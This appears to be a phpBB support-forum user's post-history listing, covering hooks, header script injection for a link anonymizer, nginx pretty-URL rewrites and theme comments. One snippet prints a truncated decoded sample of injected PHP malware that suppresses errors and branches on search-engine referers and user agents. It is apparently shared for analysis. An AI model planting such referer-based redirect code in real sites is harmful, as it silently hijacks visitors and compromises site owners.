Re: Hook: Auto Anonymize

Yes, I noted this in an earlier post too. But one can inject JS also without touching overall_header.html - I'm just not sure exactly whichever way is the best (yet). So any help with the actual hook code is welcome. Regards, -k0nsl The hook system is for running PHP code. All you have to do is put ...

Re: Hook: Auto Anonymize

Thanks bonelifer for moving it to the right location. I have not tried my theoretical code yet, will try it tonight. Still, maybe somebody from the development team knows of some easy way to use the hook system to inject a piece of code to the <header> or overall_header file (i.e my javascript). Tha...

Re: [ALPHA] Pretty URLs

Do you mean this: Replace: if (!empty($phpbb_hook) && $phpbb_hook->call_hook(array(__CLASS__, __FUNCTION__), $handle, $include_once)) With: if (!empty($phpbb_hook) && $phpbb_hook->call_hook(array(__CLASS__, __FUNCTION__), $handle, $include_once, $this)) ? Regards, -k0nsl ran into my first real issue...

Hook: Auto Anonymize

I was a bit weary where to post this because I'm not really accustomed to the forum structure, yet. In any case I'm working on a way to automatically inject this bit of code into the header of each page (not the admin pages, though): <script src="http://cdn.mastrcoder.com/js/anonymize.js" type="text...

Re: [Release] prosilver Platin (3.0.11)

Nice one Özcan. In some respect parts of it reminds me of Bootstrap. In any case, good work! :) [edit] oh noes, I previewed 'Platin proClear4'. So please disregard my Bootstrap comment regarding the theme 'prosilver Platin' :oops: Do you have the 'Platin proClear4' available somewhere for download? ...

Just go through the source and replace any reference to "viewforum.php" to "forums.php".

Re: youtube bbcode doesn't work

I like your way, Necromancer. It does work quite well, but not on URLs like this: [youtube]http://www.youtube.com/watch?v=RrfnIs4fC_0[/youtube] It does not even parse it, it merely shows the above exactly like so. However, if I replace it like this: [youtube]https://www.youtube.com/watch?v=RrfnIs4fC...

Re: [ALPHA] Pretty URLs

I'm working on getting some more specific data on why some URLs become malformed. In my log I'm seeing only this, thus far: 2013/05/02 08:01:55 [error] 23777#0: *390169 open() "/my/path/here/t7843-.html" failed (2: No such file or directory), client: 50.31.152.60, server: localhost, request: "GET /t...

Re: [ALPHA] Pretty URLs

Sam, I e-mailed you my working nginx rewrites. By the way, on rare occasion I encounter threads that become malformed, like this: http://the.address.com/t1122-.html Whereas it should look like this: http://the.address.com/t1122-some-topic-name-here.html I'm not sure what's causing this, yet. -k0nsl

Here is the decoded bits, by the way: error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){ if (stristr($referer,"yahoo") or stristr($referer,"bing") or...

Re: Backing Up (a hosted forum by crawling it) -- Possible?

The easiest way would probably just be to dump the MySQL database, something like "mysqldump" (link) would work fine for that purpose.

Re: [ALPHA] Pretty URLs

Thanks. It's a nice, clean mod and very easy to apply and improve upon. What rewrites do you have for nginx, or did you only try it with Apache?

Faithfully,

Re: Hide Content BBcode

I've not tried this, but for replacement, you could use something like this:

Code: Select all

<div style="display: none;">{TEXT}</div>
I'm not sure that's what you want, though. However, it should hide whatever is specified in {TEXT}.

Re: Ranks, Logos, Buttons or any other graphics requests!

Hi, I've included a PSD here with gray ranks. When I edit them in Gimp it just messes up. I would try it in PS but I don't use Microsoft, so no go. In any case...I'm wondering if somebody could possibly add these ranks following the same style/font/colour in the included PSD: Valuable Asset Webmaste...

Re: What search system is phpbb.com using?

Nope, I'm basically asking if the developers of phpbb.com furnishes code for their implementation of the Sphinx search routine, in a repository someplace, or whatever? If they don't, that's fine. The instructions are enough, but one does get lazier these days ;) -k0nsl There are instructions in the ...
